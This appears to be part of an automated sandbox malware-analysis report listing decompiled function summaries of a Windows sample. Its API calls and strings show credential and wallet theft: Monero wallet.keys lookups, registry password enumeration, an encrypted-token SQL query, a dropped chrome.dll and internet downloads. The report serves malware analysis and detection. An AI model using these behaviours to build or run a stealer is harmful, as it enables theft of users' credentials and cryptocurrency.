                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                • API String ID: 1930502592-218353709
                                                                                                • Opcode ID: 3c56a8906ad670cf43c6c9491f699d8d4edd2b242a0b193b6f3ff25cea90744c
                                                                                                • Instruction ID: 8a875ffafc7cdb1f6750a56d7bf9635fee6f51bf8c43acc15b4905507f63a119
                                                                                                • Opcode Fuzzy Hash: 3c56a8906ad670cf43c6c9491f699d8d4edd2b242a0b193b6f3ff25cea90744c
                                                                                                • Instruction Fuzzy Hash: 915153B1E5011857CB14EB60DD96BED733D9F54304F4045EEB60A62092EE346BD8CAAE
                                                                                                APIs
                                                                                                  • Part of subcall function 00407330: memset.MSVCRT ref: 00407374
                                                                                                  • Part of subcall function 00407330: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                                                                                  • Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                                                                                  • Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                                                                                  • Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                                                                                  • Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                                                                                • lstrcatA.KERNEL32(210DE020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                                                                                • lstrcatA.KERNEL32(210DE020,00000000,00000000), ref: 004076A8
                                                                                                • lstrcatA.KERNEL32(210DE020, : ), ref: 004076BA
                                                                                                • lstrcatA.KERNEL32(210DE020,00000000,00000000,00000000), ref: 004076EF
                                                                                                • lstrcatA.KERNEL32(210DE020,00421934), ref: 00407700
                                                                                                • lstrcatA.KERNEL32(210DE020,00000000,00000000,00000000), ref: 00407733
                                                                                                • lstrcatA.KERNEL32(210DE020,00421938), ref: 0040774D
                                                                                                • task.LIBCPMTD ref: 0040775B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                • String ID: :
                                                                                                • API String ID: 3191641157-3653984579
                                                                                                • Opcode ID: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                                                                                • Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
                                                                                                • Opcode Fuzzy Hash: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                                                                                • Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00407374
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                                                                                • RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                                                                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                                                                                  • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                                                                                • task.LIBCPMTD ref: 004075B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                • String ID: Password
                                                                                                • API String ID: 2698061284-3434357891
                                                                                                • Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                                                                                • Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
                                                                                                • Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                                                                                • Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95
                                                                                                APIs
                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                                                                                • wsprintfA.USER32 ref: 004177D0
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                • String ID: :$C$\
                                                                                                • API String ID: 3790021787-3809124531
                                                                                                • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                                                                                • Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
                                                                                                • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                                                                                • Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00973DF8,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00973DF8,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                                                                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                                                                                • __aulldiv.LIBCMT ref: 00418302
                                                                                                • __aulldiv.LIBCMT ref: 00418310
                                                                                                • wsprintfA.USER32 ref: 0041833C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                • String ID: %d MB$@
                                                                                                • API String ID: 2886426298-3474575989
                                                                                                • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                                                                                • Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
                                                                                                • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                                                                                • Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                  • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                  • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
                                                                                                • StrCmpCA.SHLWAPI(?,00976668), ref: 00406197
                                                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                                                                                • InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                                                                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                                                                                • InternetCloseHandle.WININET(00412DB1), ref: 004062A3
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 4287319946-0
                                                                                                • Opcode ID: 28317a5f4b32b5285a3637a607846846f53c0ba5e8d8391b34f33a6405c08cc5
                                                                                                • Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
                                                                                                • Opcode Fuzzy Hash: 28317a5f4b32b5285a3637a607846846f53c0ba5e8d8391b34f33a6405c08cc5
                                                                                                • Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59
                                                                                                APIs
                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
                                                                                                • memset.MSVCRT ref: 004173EA
                                                                                                • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E
                                                                                                Strings
                                                                                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: OpenProcesslstrcpymemset
                                                                                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                • API String ID: 224852652-4138519520
                                                                                                • Opcode ID: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                                                                                • Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
                                                                                                • Opcode Fuzzy Hash: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                                                                                • Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BC6F
                                                                                                  • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BD75
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BD89
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                • API String ID: 1440504306-1079375795
                                                                                                • Opcode ID: 34a5fec9f442c2823ea9618ff25306948c13a5273e9f73e96b93716083a88691
                                                                                                • Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
                                                                                                • Opcode Fuzzy Hash: 34a5fec9f442c2823ea9618ff25306948c13a5273e9f73e96b93716083a88691
                                                                                                • Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                                                                                  • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                                                                                • StrCmpCA.SHLWAPI(00000000,0096C408), ref: 00410922
                                                                                                • StrCmpCA.SHLWAPI(00000000,0096C3F8), ref: 00410B79
                                                                                                • StrCmpCA.SHLWAPI(00000000,0096C418), ref: 00410A0C
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                                                                                Strings
                                                                                                • C:\ProgramData\chrome.dll, xrefs: 00410C30
                                                                                                • C:\ProgramData\chrome.dll, xrefs: 004108CD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                                                                                • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                                                                                • API String ID: 585553867-663540502
                                                                                                • Opcode ID: 3cba495796730e71670c0198b1c3556984460aa715bb36b7f53b4f9760dbd593
